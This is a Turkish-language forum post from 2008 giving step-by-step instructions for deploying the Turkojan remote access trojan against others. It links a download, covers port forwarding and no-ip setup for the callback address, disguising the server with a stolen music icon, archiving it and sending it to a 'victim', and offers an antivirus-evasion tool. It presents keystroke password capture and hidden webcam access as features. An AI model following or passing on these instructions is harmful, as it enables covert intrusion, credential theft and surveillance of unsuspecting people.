kuzandonoz
Would you like to react to this message? Create an account in a few clicks or log in to continue.

kuzandonoz

kuzandonoz

AnasayfaLatest imagesAramaKayıt OlGiriş yap

Turkojan4 İle Msn Hack

YazarMesaj
Admin
Admin
Admin

Turkojan4 İle Msn Hack Empty
MesajKonu: Turkojan4 İle Msn Hack   Turkojan4 İle Msn Hack Icon_minitimePaz Eyl. 28, 2008 8:58 pm

arkadaşlar öncelikle programın ismi turkojan 4 hepimiz ne olduğunu az çok biliyoruzdur heralde. bu kou zaten sitede var niye eklion felan filan demeyin çünkü bende baktım onlara nerdeyse hepsi kişilerin kendi hazırladıkları server yani tuzak oluyor sizin için. şimdi acemi arkadaşlar çoktur onun için ben kısa bi açıklama yapam burayave sonra neler yapmanız gerektiğini anlatam. Turkojan Microsoft Windows tabanlı işletim sistemlerini yönetim ve denetim amaçlı yazılmış,bir uzaktan yönetim ve denetim programıdır.Program yardımı ile bağlandığınız bilgisayarları kolaylıkla kontrol edebilir ve takip edebilirsiniz. Ayrıca bilgiayarda girilen her türlü şifre, gizli webcam, karşı pc yi siz yönetebilme imkanları var. şimdi ilk olarak http://rapidshare.com/files/113985902/Turkojan.4.Xclusive.exe
Turkojan4 İle Msn Hack Ss1
arkadaşlar programın görünümü bu şimdi ilk başta programı indirdik ama programı kurmakla iş bitmiyor. öncelikle port açmamız gerekli bunun için başlat-çalıştır-cmd yazın. daha sonra karşınıza pencere açılacak buraya ipconfig yazın. daha sonra ip adresleri gelecek en üstteki ip adresini kopyalayın ve internet explorer yazıp enterlayın. bundan sonrasını http://www.turkojan.com/eng/screent/ss1.JPG adresinden bakıp yapın. modeminiz markasını ordan seçin ve nasıl yapılacanı öğrenin. eğer yapamazsanız bana söyleyin. yanlız bu port açma meselesi sadece ethernetle bağlanan için gerekli usb ile bağlananlar bunu yapmasınlar. şimdi ethernet ile bağlananlar varsayılım açtılar portu portun numarası 15963 usb ile bağlananlar zaten açmıyo bunu direkwww.no-ip.com adresinden üyelik alsınlar. bu sayafaya girdin mi sgn up now yazan bi yer var orayı tıklayın bilgileri doldurun email adresi gerçek olsun bir de How did you hear about us? yazan yeri host/ISP yapın sonra kayıt olun email adresinize mail gelecek no-ip.com dan girin maile ve activasion edin ve email ve yazdınız şifre ile giriş yapın. hosts/recidets yazan yerin altında add yazar onu tıklayın ve sadece isim yazın create yapıp işi bitirin şimdi sitede download yazan yere tıklayıp no-ip programını indirin kurun. sizden email ve şifre isteyecek buraya siteye üye olurken email ve şifreyi yazın. şimdi no-ip çalıştı bi bebek ve yanında kutucuk olacak kutucuğu tıklayın bebek gülsün. sonra turkojan programını açın ve editörü tıklayın adres yazan yere no-ip den aldınız adresi yani no-ip.biz ile size verilen adresi yazın. sonra ordaki kutucukların hepsini seçin ad yazan yere herhangi bi isim yazın simge hırsızı müzik resim simgesini alır yani karşıya müzik atıyom al felan dersiniz işte onun için. kaydedin ve çıkın yanlız bunları yapmadan önce editörü ıklamadan önce programın sağa üst köşesinde ki activate yazan yeri tıklayın program çalışsın. server kurduk iş bitti mi hayır şimdi yaptımız servera gelip sağ tıklayıp add to archive türkçesi arşive ekleyi tıklayın tamam deyin sonra winrara şeklind olan dosyyı kurbana atın alırsa işlem tamam açar açmaz. programın altında türk bayraklı birşey çıkacfak bunu gördükten sonra istedinizi yapabilirsiniz program hakıkında bilgi ve yardım için help.msn.passport@hotmail.com adresine mail atın ben size yardım ederim video yoluyla kayıt ettim programı isterseniz adresimdende yolayabilirim ha unutmadan bu program şimdi antivirüslere yakalanabilir yani bi nod 32 yakalnamaz ama daha güçlülre yakalanır bende anti virüsten gizleme programı var bunuda size mail adresimden yollarım artık bi tşk edersiniz herkesin server larak yolayıpta insanarın canını sıkmanızdan bıkmadık yanlız arkadaşlar programı ben kurduğumda antivirüs engelledi. antivirüs programı mı sildim program düzgünce çalışıyor. ben 4 yıl böyle bir program aradım ve 4 yıl içinde bilgisayar kaç kere çöktü bilemezsiniz yanlız programla karşı kişilerin bilgisayarını çökertmek felan gibi pis işlerde kullanmayın 2 yıl 6 aydan başlıyor tşk bekliyorum
http://kuzandonoz.eniyiforum.net

Turkojan4 İle Msn Hack
1 sayfadaki 1 sayfası